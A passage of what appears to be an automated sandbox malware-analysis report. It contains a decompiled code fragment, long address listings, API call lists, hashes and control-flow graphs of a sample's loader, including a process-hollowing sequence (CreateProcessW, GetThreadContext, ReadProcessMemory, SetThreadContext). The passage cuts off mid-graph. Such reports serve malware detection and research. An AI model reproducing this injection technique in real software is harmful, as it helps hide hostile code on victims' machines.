					_t511 =  *(_t473 + 4);
					_t451 =  *( *(_t473 + 4)) & 0x0000ffff;
					if(_t451 == 0x2f || _t451 == 0x2d) {
						if(E01061960( &(_t511[1]), "@") == 0) {
							goto L11;
						} else {
							if(E01061B50( *((intOrPtr*)(_t473 + 8)),  &_a12,  &_v8) != 0) {
								_t522 = _a12;
								_t473 = _v8;
								goto L11;
							} else {
								return 1;
							}
						}
					} else {
						goto L11;
					}
				}
			}





























































































































                        0x01061c90
                        0x01061c93
                        0x01061ca9
                        0x01061cb0
                        0x01061cb7
                        0x01061cbe
                        0x01061cc5
                        0x01061ccc
                        0x01061cd3
                        0x01061cda
                        0x01061ce1
                        0x01061ce8
                        0x01061cef
                        0x01061cf6
                        0x01061cfd
                        0x01061d04
                        0x01061d0b
                        0x01061d12
                        0x01061d19
                        0x01061d20
                        0x01061d27
                        0x01061d2e
                        0x01061d35
                        0x01061d3c
                        0x01061d43
                        0x01061d5f
                        0x01061d71
                        0x01061d76
                        0x01061d78
                        0x01061d7b
                        0x01061d7e
                        0x01061d87
                        0x01061d89
                        0x01061d8d
                        0x01061d92
                        0x01061d9c
                        0x01061da1
                        0x01061da3
                        0x01061da5
                        0x01061da7
                        0x01061da8
                        0x01061dad
                        0x01061dae
                        0x01061db3
                        0x01061db5
                        0x01061db7
                        0x01061db8
                        0x01061dba
                        0x01061dd2
                        0x01061dd6
                        0x01061ddb
                        0x01061dde
                        0x01061de2
                        0x01061de4
                        0x01061deb
                        0x01061df6
                        0x01061df8
                        0x01061df9
                        0x01061dff
                        0x01061e03
                        0x01061e03
                        0x01061de4
                        0x01061e07
                        0x01061e07
                        0x01061e09
                        0x01061e1e
                        0x01061e23
                        0x01061e26
                        0x01061e2c
                        0x01061e78
                        0x01061e78
                        0x01061e7b
                        0x01061eb0
                        0x01061eb0
                        0x01061eb5
                        0x01061eb8
                        0x01061eba
                        0x01061ec0
                        0x01061ec0
                        0x01061ec3
                        0x01061ec6
                        0x01061ec9
                        0x01061ed0
                        0x01061ed9
                        0x01061ede
                        0x01061ee0
                        0x00000000
                        0x01061ee2
                        0x01061ee2
                        0x01061ee2
                        0x01061ecb
                        0x01061ecb
                        0x01061ece
                        0x01061eee
                        0x01061eee
                        0x01061ef1
                        0x01061ef4
                        0x01061ef7
                        0x01061efe
                        0x01061f07
                        0x01061f0c
                        0x01061f0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061ef9
                        0x01061ef9
                        0x01061efc
                        0x01061f14
                        0x01061f14
                        0x01061f17
                        0x01061f1a
                        0x01061f1d
                        0x01061f24
                        0x01061f2d
                        0x01061f32
                        0x01061f34
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f1f
                        0x01061f1f
                        0x01061f22
                        0x01061f3a
                        0x01061f3a
                        0x01061f3d
                        0x01061f40
                        0x01061f43
                        0x01061f4a
                        0x01061f53
                        0x01061f58
                        0x01061f5a
                        0x010625cd
                        0x010625cd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f45
                        0x01061f45
                        0x01061f48
                        0x01061f60
                        0x01061f60
                        0x01061f63
                        0x01061f66
                        0x01061f69
                        0x01061f70
                        0x01061f79
                        0x01061f7e
                        0x01061f80
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f6b
                        0x01061f6b
                        0x01061f6e
                        0x01061f86
                        0x01061f86
                        0x01061f89
                        0x01061f8c
                        0x01061f8f
                        0x01061f96
                        0x01061f9f
                        0x01061fa4
                        0x01061fa6
                        0x01062560
                        0x01062560
                        0x01062563
                        0x01062566
                        0x01062569
                        0x01062574
                        0x0106257d
                        0x0106256b
                        0x0106256b
                        0x0106256e
                        0x00000000
                        0x01062570
                        0x01062570
                        0x01062570
                        0x0106256e
                        0x01062582
                        0x0106258e
                        0x01062594
                        0x0106259e
                        0x010625a4
                        0x010625a6
                        0x010625b6
                        0x010625b9
                        0x010625ba
                        0x010625bc
                        0x00000000
                        0x00000000
                        0x010625c2
                        0x010625c8
                        0x010625a8
                        0x010625a8
                        0x010625ab
                        0x010625ae
                        0x010625b1
                        0x010625b1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f91
                        0x01061f91
                        0x01061f94
                        0x01061fac
                        0x01061fac
                        0x01061faf
                        0x01061fb2
                        0x01061fb5
                        0x01061fbc
                        0x01061fc5
                        0x01061fca
                        0x01061fcc
                        0x00000000
                        0x01061fce
                        0x01061fce
                        0x01061fcf
                        0x01061fd6
                        0x01061fdd
                        0x01061fe4
                        0x01061fe6
                        0x00000000
                        0x00000000
                        0x01061ff8
                        0x01061ffb
                        0x01062000
                        0x01062000
                        0x01061fb7
                        0x01061fb7
                        0x01061fba
                        0x01062008
                        0x01062008
                        0x0106200b
                        0x0106200e
                        0x01062011
                        0x01062018
                        0x01062021
                        0x01062026
                        0x01062028
                        0x00000000
                        0x0106202a
                        0x0106202d
                        0x01062033
                        0x01062035
                        0x0106203a
                        0x01062041
                        0x01062043
                        0x01062050
                        0x01062056
                        0x0106205a
                        0x0106205d
                        0x01062060
                        0x01062070
                        0x01062070
                        0x01062071
                        0x0106207b
                        0x0106207b
                        0x0106207e
                        0x0106207f
                        0x01062084
                        0x01062062
                        0x01062069
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01062069
                        0x01062087
                        0x01062087
                        0x01062088
                        0x01062088
                        0x0106208c
                        0x00000000
                        0x01062043
                        0x01062013
                        0x01062013
                        0x01062016
                        0x01062091
                        0x01062091
                        0x01062094
                        0x01062097
                        0x0106209a
                        0x010620a1
                        0x010620aa
                        0x010620af
                        0x010620b1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0106209c
                        0x0106209c
                        0x0106209f
                        0x010620b7
                        0x010620b7
                        0x010620bf
                        0x010620c4
                        0x010620c6
                        0x010624e7
                        0x010624e7
                        0x010624ea
                        0x010624f1
                        0x010624f4
                        0x010624f7
                        0x010624fe
                        0x01062507
                        0x0106250c
                        0x0106250e
                        0x00000000
                        0x01062510
                        0x01062513
                        0x01062516
                        0x01062516
                        0x010624f9
                        0x010624f9
                        0x010624fc
                        0x0106251b
                        0x0106251b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010624fc
                        0x0106251e
                        0x01062520
                        0x01062528
                        0x01062528
                        0x01062529
                        0x0106252b
                        0x00000000
                        0x00000000
                        0x01062531
                        0x0106253c
                        0x01062543
                        0x01062522
                        0x01062522
                        0x01062526
                        0x0106254d
                        0x01062559
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01062526
                        0x010620cc
                        0x010620cc
                        0x010620d4
                        0x010620d9
                        0x010620db
                        0x01062172
                        0x01062177
                        0x01062179
                        0x0106218c
                        0x01062191
                        0x01062193
                        0x010621ba
                        0x010621c2
                        0x010621c7
                        0x010621c9
                        0x010621e5
                        0x010621ed
                        0x010621f2
                        0x010621f4
                        0x01062238
                        0x01062240
                        0x01062245
                        0x01062247
                        0x0106231a
                        0x01062322
                        0x01062327
                        0x01062329
                        0x010624cc
                        0x010624cc
                        0x010624cd
                        0x010624d4
                        0x010624d6
                        0x00000000
                        0x00000000
                        0x010624df
                        0x0106232f
                        0x0106232f
                        0x01062337
                        0x0106233c
                        0x0106233e
                        0x00000000
                        0x01062344
                        0x01062344
                        0x0106234c
                        0x01062351
                        0x01062353
                        0x010623be
                        0x010623c6
                        0x010623cb
                        0x010623cd
                        0x010623e2
                        0x010623ea
                        0x010623ef
                        0x010623f1
                        0x0106240e
                        0x01062416
                        0x0106241b
                        0x0106241d
                        0x0106243a
                        0x01062442
                        0x01062447
                        0x01062449
                        0x01062768
                        0x0106276a
                        0x00000000
                        0x0106276a
                        0x0106244f
                        0x01062457
                        0x0106245c
                        0x0106245e
                        0x00000000
                        0x00000000
                        0x01062464
                        0x0106246c
                        0x01062471
                        0x01062473
                        0x01062481
                        0x01062489
                        0x0106248e
                        0x01062490
                        0x0106249e
                        0x010624a6
                        0x010624ab
                        0x010624ad
                        0x010624c2
                        0x010624af
                        0x010624af
                        0x010624af
                        0x01062492
                        0x01062492
                        0x01062492
                        0x01062475
                        0x01062475
                        0x01062475
                        0x0106241f
                        0x0106241f
                        0x01062420
                        0x01062427
                        0x01062429
                        0x00000000
                        0x00000000
                        0x01062432
                        0x01062432
                        0x010623f3
                        0x010623f3
                        0x010623f4
                        0x010623fb
                        0x010623fd
                        0x00000000
                        0x00000000
                        0x01062406
                        0x01062406
                        0x010623cf
                        0x010623d8
                        0x010623d8
                        0x01062355
                        0x01062358
                        0x0106235e
                        0x01062361
                        0x010623b2
                        0x010623b2
                        0x01062363
                        0x0106236f
                        0x01062374
                        0x01062376
                        0x00000000
                        0x01062378
                        0x01062384
                        0x01062389
                        0x0106238b
                        0x00000000
                        0x0106238d
                        0x01062399
                        0x0106239e
                        0x010623a0
                        0x010623a6
                        0x010623a6
                        0x010623a0
                        0x0106238b
                        0x01062376
                        0x01062361
                        0x01062353
                        0x0106233e
                        0x0106224d
                        0x01062250
                        0x01062256
                        0x01062259
                        0x01062262
                        0x01062265
                        0x01062268
                        0x01062268
                        0x0106226b
                        0x0106226b
                        0x01062270
                        0x01062273
                        0x01062276
                        0x01062279
                        0x0106227b
                        0x0106227b
                        0x01062282
                        0x00000000
                        0x010622de
                        0x010622de
                        0x00000000
                        0x00000000
                        0x010622d2
                        0x00000000
                        0x00000000
                        0x010622d9
                        0x00000000
                        0x00000000
                        0x01062298
                        0x00000000
                        0x00000000
                        0x010622ad
                        0x00000000
                        0x00000000
                        0x01062293
                        0x00000000
                        0x00000000
                        0x01062289
                        0x00000000
                        0x00000000
                        0x010622b5
                        0x00000000
                        0x00000000
                        0x010622ba
                        0x00000000
                        0x00000000
                        0x010622c2
                        0x00000000
                        0x00000000
                        0x010622a0
                        0x00000000
                        0x00000000
                        0x010622a8
                        0x00000000
                        0x00000000
                        0x010622ca
                        0x00000000
                        0x00000000
                        0x0106228e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01062282
                        0x010622e1
                        0x010622e1
                        0x010622e4
                        0x010622e4
                        0x010622e4
                        0x010622e7
                        0x010622ea
                        0x010622ed
                        0x010622f0
                        0x010622f0
                        0x010622f3
                        0x010622f4
                        0x010622f6
                        0x00000000
                        0x00000000
                        0x01062305
                        0x0106230a
                        0x0106230c
                        0x01062314
                        0x01062314
                        0x0106230c
                        0x010621f6
                        0x010621f6
                        0x010621f7
                        0x010621f9
                        0x00000000
                        0x00000000
                        0x010621ff
                        0x01062202
                        0x01062204
                        0x01062207
                        0x0106220a
                        0x01062210
                        0x01062210
                        0x01062214
                        0x00000000
                        0x00000000
                        0x0106221f
                        0x01062222
                        0x01062225
                        0x01062228
                        0x0106222b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0106222b
                        0x01062210
                        0x0106222d
                        0x01062230
                        0x01062230
                        0x010621cb
                        0x010621cb
                        0x010621cc
                        0x010621ce
                        0x00000000
                        0x00000000
                        0x010621db
                        0x010621db
                        0x01062195
                        0x01062195
                        0x00000000
                        0x01062195
                        0x0106217b
                        0x0106217b
                        0x0106219c
                        0x0106219c
                        0x0106219d
                        0x010621a4
                        0x010621a6
                        0x00000000
                        0x00000000
                        0x010621af
                        0x010621b2
                        0x010621b2
                        0x010620e1
                        0x010620e4
                        0x010620ea
                        0x010620ec
                        0x010620f1
                        0x010620f8
                        0x010620fa
                        0x01062100
                        0x01062106
                        0x0106210a
                        0x0106210d
                        0x01062110
                        0x01062132
                        0x01062132
                        0x01062133
                        0x0106213d
                        0x0106213d
                        0x01062140
                        0x01062141
                        0x01062146
                        0x01062112
                        0x01062112
                        0x01062119
                        0x00000000
                        0x01062129
                        0x00000000
                        0x00000000
                        0x01062120
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01062119
                        0x01062149
                        0x01062149
                        0x0106214a
                        0x0106214a
                        0x01062100
                        0x0106214e
                        0x0106214e
                        0x01062151
                        0x01062152
                        0x01062154
                        0x0106276f
                        0x01062771
                        0x01062778
                        0x01062778
                        0x0106277b
                        0x0106277f
                        0x01062781
                        0x01062783
                        0x01062785
                        0x01062787
                        0x01062789
                        0x0106278b
                        0x0106278d
                        0x0106278f
                        0x01062791
                        0x01062793
                        0x01062795
                        0x01062797
                        0x01062799
                        0x0106279b
                        0x0106279d
                        0x0106279f
                        0x010627a1
                        0x010627a3
                        0x010627a5
                        0x010627a7
                        0x010627a9
                        0x010627ab
                        0x010627ad
                        0x010627af
                        0x010627b1
                        0x010627b3
                        0x010627b5
                        0x010627bb
                        0x010627bd
                        0x010627bf
                        0x010627c1
                        0x010627c3
                        0x010627f0
                        0x010627f3
                        0x010627f7
                        0x010627f9
                        0x010627fb
                        0x01062803
                        0x0106280b
                        0x01062811
                        0x01062815
                        0x01062817
                        0x01062823
                        0x01062829
                        0x0106282b
                        0x01062835
                        0x0106284c
                        0x01062858
                        0x0106285a
                        0x0106286c
                        0x01062878
                        0x0106287a
                        0x01062880
                        0x01062883
                        0x01062884
                        0x01062884
                        0x0106215a
                        0x01062160
                        0x01062163
                        0x01062163
                        0x010620db
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0106209f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01062016
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061fba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f94
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f6e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f48
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061f22
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061efc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061ece
                        0x010625d4
                        0x010625d5
                        0x010625d8
                        0x010625d8
                        0x01061ec0
                        0x010625e5
                        0x010625ea
                        0x010625ee
                        0x010625f3
                        0x010625f7
                        0x010625fa
                        0x010625fc
                        0x010625ff
                        0x01062601
                        0x01062603
                        0x01062605
                        0x01062605
                        0x01062608
                        0x0106260d
                        0x0106260f
                        0x01062674
                        0x01062678
                        0x00000000
                        0x0106267a
                        0x0106267a
                        0x0106267e
                        0x010626a0
                        0x010626a2
                        0x010626be
                        0x010626c2
                        0x01062701
                        0x01062705
                        0x0106271a
                        0x0106271e
                        0x01062730
                        0x01062734
                        0x01062746
                        0x0106274a
                        0x0106275c
                        0x01062760
                        0x00000000
                        0x01062766
                        0x00000000
                        0x0106274c
                        0x0106274c
                        0x01062759
                        0x01062759
                        0x01062736
                        0x01062743
                        0x01062743
                        0x01062720
                        0x0106272d
                        0x0106272d
                        0x01062707
                        0x01062717
                        0x01062717
                        0x010626c4
                        0x010626d0
                        0x010626dc
                        0x010626de
                        0x010626e0
                        0x00000000
                        0x010626e6
                        0x010626e6
                        0x010626e9
                        0x010626eb
                        0x010626ee
                        0x010626ee
                        0x010626f4
                        0x010626fe
                        0x010626fe
                        0x010626e0
                        0x010626a4
                        0x010626ae
                        0x010626bb
                        0x010626bb
                        0x01062680
                        0x01062681
                        0x01062690
                        0x0106269d
                        0x0106269d
                        0x0106267e
                        0x01062611
                        0x01062611
                        0x01062615
                        0x0106261b
                        0x0106261e
                        0x0106264a
                        0x0106264c
                        0x01062651
                        0x01062653
                        0x01062656
                        0x00000000
                        0x01062658
                        0x01062659
                        0x0106265e
                        0x01062660
                        0x00000000
                        0x01062662
                        0x01062664
                        0x01062671
                        0x01062671
                        0x01062660
                        0x01062620
                        0x01062620
                        0x01062625
                        0x0106262d
                        0x0106262f
                        0x0106262f
                        0x01062630
                        0x00000000
                        0x01062632
                        0x01062638
                        0x0106263d
                        0x0106263f
                        0x01062647
                        0x01062647
                        0x01062630
                        0x0106261e
                        0x01061e7d
                        0x01061e7d
                        0x01061e80
                        0x01061e83
                        0x01061e86
                        0x01061e8d
                        0x01061e96
                        0x01061e9b
                        0x01061e9d
                        0x00000000
                        0x01061e9f
                        0x01061ead
                        0x01061ead
                        0x01061e88
                        0x01061e88
                        0x01061e8b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061e8b
                        0x01061e86
                        0x01061e2e
                        0x01061e2e
                        0x01061e31
                        0x01061e37
                        0x01061e4e
                        0x00000000
                        0x01061e50
                        0x01061e62
                        0x01061e72
                        0x01061e75
                        0x00000000
                        0x01061e64
                        0x01061e6f
                        0x01061e6f
                        0x01061e62
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061e37

                        APIs
                        • LoadLibraryW.KERNEL32(Kernel32.dll,GetTickCount), ref: 01061D4A
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D53
                        • LoadLibraryW.KERNEL32(Kernel32.dll,Sleep), ref: 01061D62
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D65
                        • LoadLibraryW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 01061D73
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D76
                        • Sleep.KERNELBASE(000002BE), ref: 01061D87
                        • GetCommandLineW.KERNEL32(00000000,00000000), ref: 01061E17
                          • Part of subcall function 01063B3A: __wfsopen.LIBCMT ref: 01063B45
                        • _fseek.LIBCMT ref: 01061DA8
                        • _fseek.LIBCMT ref: 01061DBA
                          • Part of subcall function 010633B4: __lock_file.LIBCMT ref: 010633F5
                          • Part of subcall function 010633B4: __fseek_nolock.LIBCMT ref: 01063404
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 01061DCC
                        • __fread_nolock.LIBCMT ref: 01061DD6
                        • #17.COMCTL32 ref: 01061E07
                        • lstrlenW.KERNEL32(00000000,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?,unreg,?,unregister,?,unregserver,?), ref: 0106202D
                        • _fprintf.LIBCMT ref: 0106207F
                        • lstrlenW.KERNEL32(00000000,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?,unreg,?,unregister,?), ref: 010620E4
                          • Part of subcall function 01061960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(00000000,00000000,0107B664,00000000,0107B660,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?), ref: 01062250
                        • ExitProcess.KERNEL32 ref: 01062314
                        • lstrlenW.KERNEL32(00000000,00000000,0107B664,00000000,0107B660,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?), ref: 01062358
                          • Part of subcall function 010611A0: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000001,00000000,0106273B), ref: 010611AC
                          • Part of subcall function 010611A0: _fprintf.LIBCMT ref: 010611C6
                        • lstrlenW.KERNEL32(00000000), ref: 01062615
                        • CLSIDFromString.OLE32(00000000,?), ref: 01062625
                        • FreeLibrary.KERNEL32(00000000), ref: 010626EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrlen$Library$AddressLoadProc$_fprintf_fseek$AllocByteCharCommandExitFreeFromLineManagerMultiOpenProcessSleepStringVirtualWide__fread_nolock__fseek_nolock__lock_file__wfsopen
                        • String ID: ACTION=ADMIN$DllRegisterServer$Embedding$GetTickCount$Kernel32.dll$REBOOTPROMPT="S"$REMOVE=ALL$Sleep$Unknown option "%c" in Advertise mode$Unknown option "%c" in Repair mode$VirtualAlloc$help$package$passive$regserver$uiet$uninstall$unreg$unregister$unregserver$update
                        • API String ID: 826615825-3143363541
                        • Opcode ID: 62b3fd91d5f29b255c6f95933e02c17a4c7d37e09774ff0501d5f3de77ac6885
                        • Instruction ID: 3a5545792dbd3f33e72a8596314ccb8b7aabf99d0f353ffe8543662edae0e76e
                        • Opcode Fuzzy Hash: 62b3fd91d5f29b255c6f95933e02c17a4c7d37e09774ff0501d5f3de77ac6885
                        • Instruction Fuzzy Hash: E252B271E002199BEF20DFA9CC88BAEBBEDAF58344F140495EAC2EB141D775C941CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E08B7 Relevance: 6.4, APIs: 4, Instructions: 438COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 554 5e08b7-5e09b2 call 5e005f call 5e0838 call 5e0073 * 8 576 5e09b9-5e09c9 554->576 577 5e09b4 554->577 580 5e09cb 576->580 581 5e09d0-5e09f3 CreateFileW 576->581 578 5e0e53-5e0e56 577->578 580->578 582 5e09fa-5e0a20 VirtualAlloc ReadFile 581->582 583 5e09f5 581->583 584 5e0a27-5e0a3a 582->584 585 5e0a22 582->585 583->578 587 5e0e3d-5e0e4c call 5e020a 584->587 588 5e0a40-5e0e38 584->588 585->578 591 5e0e4e-5e0e50 ExitProcess 587->591
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocNumaVirtual
                        • String ID:
                        • API String ID: 4233825816-0
                        • Opcode ID: 260845a928558d5c3f9686e236e371877df7031ce22453a8b50d5c71c2b894c8
                        • Instruction ID: 3138411a551d9e230a9c6fb403f724126f789a3a9dc8868b5400f0d3e9bdc8f1
                        • Opcode Fuzzy Hash: 260845a928558d5c3f9686e236e371877df7031ce22453a8b50d5c71c2b894c8
                        • Instruction Fuzzy Hash: FA126820C5D2D9ADDF06CBE984557FDBFB09F2A201F0845D6E4E0B5283D17A838ADB25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E07DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 658 5e07da-5e0820 call 5e005f call 5e0073 GetSystemInfo 664 5e0829 658->664 665 5e0822-5e0825 658->665 666 5e082b-5e082e 664->666 665->666
                        APIs
                        • GetSystemInfo.KERNELBASE(?), ref: 005E07F7
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                        • Instruction ID: afe317e66d0a180c75ff9edf9a600eff4303f91ce10263807c02ac16e49c3779
                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                        • Instruction Fuzzy Hash: 8EF0A772D1414CAFDB0CE6B9884D6BE7BACEB48300F105569E686E2181D574858082A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E0E57 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 318 5e0e57-5e0f27 call 5e005f call 5e0073 * 7 call 5e0109 CreateFileW 337 5e0f2d-5e0f38 318->337 338 5e1006 318->338 337->338 343 5e0f3e-5e0f4e VirtualAlloc 337->343 339 5e1008-5e100d 338->339 340 5e100f 339->340 341 5e1013-5e1018 339->341 340->341 347 5e1034-5e1037 341->347 343->338 344 5e0f54-5e0f63 ReadFile 343->344 344->338 346 5e0f69-5e0f88 VirtualAlloc 344->346 348 5e0f8a-5e0f9d call 5e00da 346->348 349 5e1002-5e1004 346->349 350 5e101a-5e101e 347->350 351 5e1039-5e103e 347->351 360 5e0f9f-5e0faa 348->360 361 5e0fd8-5e0fe8 call 5e0073 348->361 349->339 353 5e102a-5e102c 350->353 354 5e1020-5e1028 350->354 355 5e104b-5e1053 351->355 356 5e1040-5e1048 VirtualFree 351->356 358 5e102e-5e1031 353->358 359 5e1033 353->359 354->347 356->355 358->347 359->347 362 5e0fad-5e0fd6 call 5e00da 360->362 361->339 367 5e0fea-5e0fef 361->367 362->361 368 5e0ff5-5e1000 VirtualFree 367->368 369 5e0ff1-5e0ff2 FindCloseChangeNotification 367->369 368->347 369->368
                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30), ref: 005E0F1D
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040), ref: 005E0F47
                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000), ref: 005E0F5E
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040), ref: 005E0F80
                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?,00000000,0000000E), ref: 005E0FF2
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?), ref: 005E0FFD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?), ref: 005E1048
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                        • String ID:
                        • API String ID: 656311269-0
                        • Opcode ID: 76098669a522c9ff5f4e6c349c922839456ff10fd15b103bde380ed37331c86f
                        • Instruction ID: 3795111f28a910cf282477c0ab0b654abf0201f5046be50e635e3e3f46ebbf54
                        • Opcode Fuzzy Hash: 76098669a522c9ff5f4e6c349c922839456ff10fd15b103bde380ed37331c86f
                        • Instruction Fuzzy Hash: 4A51C271E00789ABDB24DFB6CC4CBAEBB78BF44710F144515F590FB280E67499818B68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 005E020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 370 5e020a-5e0225 call 5e005f 373 5e0228-5e022c 370->373 374 5e022e-5e0242 373->374 375 5e0244-5e0251 373->375 374->373 376 5e0254-5e0258 375->376 377 5e025a-5e026e 376->377 378 5e0270-5e027d 376->378 377->376 379 5e0280-5e0284 378->379 380 5e029c-5e037a call 5e0073 * 8 379->380 381 5e0286-5e029a 379->381 398 5e037c-5e0386 380->398 399 5e0391 380->399 381->379 398->399 401 5e0388-5e038f 398->401 400 5e0395-5e03b1 399->400 403 5e03ba 400->403 404 5e03b3-5e03b5 400->404 401->400 406 5e03c1-5e03e9 CreateProcessW 403->406 405 5e0734-5e0737 404->405 407 5e03eb 406->407 408 5e03f0-5e0409 GetThreadContext 406->408 409 5e06e8-5e06ec 407->409 410 5e040b 408->410 411 5e0410-5e042d ReadProcessMemory 408->411 414 5e06ee-5e06f2 409->414 415 5e0731-5e0733 409->415 410->409 412 5e042f 411->412 413 5e0434-5e043d 411->413 412->409 418 5e043f-5e044e 413->418 419 5e0464-5e0483 call 5e129d 413->419 416 5e06f4-5e06ff 414->416 417 5e0705-5e0709 414->417 415->405 416->417 421 5e070b 417->421 422 5e0711-5e0715 417->422 418->419 423 5e0450-5e045d call 5e1208 418->423 429 5e048a-5e04ab call 5e13b7 419->429 430 5e0485 419->430 421->422 426 5e071d-5e0721 422->426 427 5e0717 422->427 423->419 434 5e045f 423->434 431 5e072d-5e072f 426->431 432 5e0723-5e0728 call 5e1208 426->432 427->426 438 5e04ad-5e04b4 429->438 439 5e04f0-5e0510 call 5e13b7 429->439 430->409 431->405 432->431 434->409 441 5e04eb 438->441 442 5e04b6-5e04e2 call 5e13b7 438->442 445 5e0517-5e052c call 5e00da 439->445 446 5e0512 439->446 441->409 449 5e04e9 442->449 450 5e04e4 442->450 452 5e0535-5e053f 445->452 446->409 449->439 450->409 453 5e0571-5e0575 452->453 454 5e0541-5e056f call 5e00da 452->454 456 5e057b-5e0589 453->456 457 5e0655-5e0671 call 5e1056 453->457 454->452 456->457 460 5e058f-5e059d 456->460 464 5e0675-5e0696 SetThreadContext 457->464 465 5e0673 457->465 460->457 463 5e05a3-5e05c3 460->463 466 5e05c6-5e05ca 463->466 468 5e069a-5e06a4 call 5e1157 464->468 469 5e0698 464->469 465->409 466->457 467 5e05d0-5e05e5 466->467 470 5e05f7-5e05fb 467->470 475 5e06a8-5e06ac 468->475 476 5e06a6 468->476 469->409 472 5e05fd-5e0609 470->472 473 5e0638-5e0650 470->473 477 5e060b-5e0634 472->477 478 5e0636 472->478 473->466 479 5e06ae 475->479 480 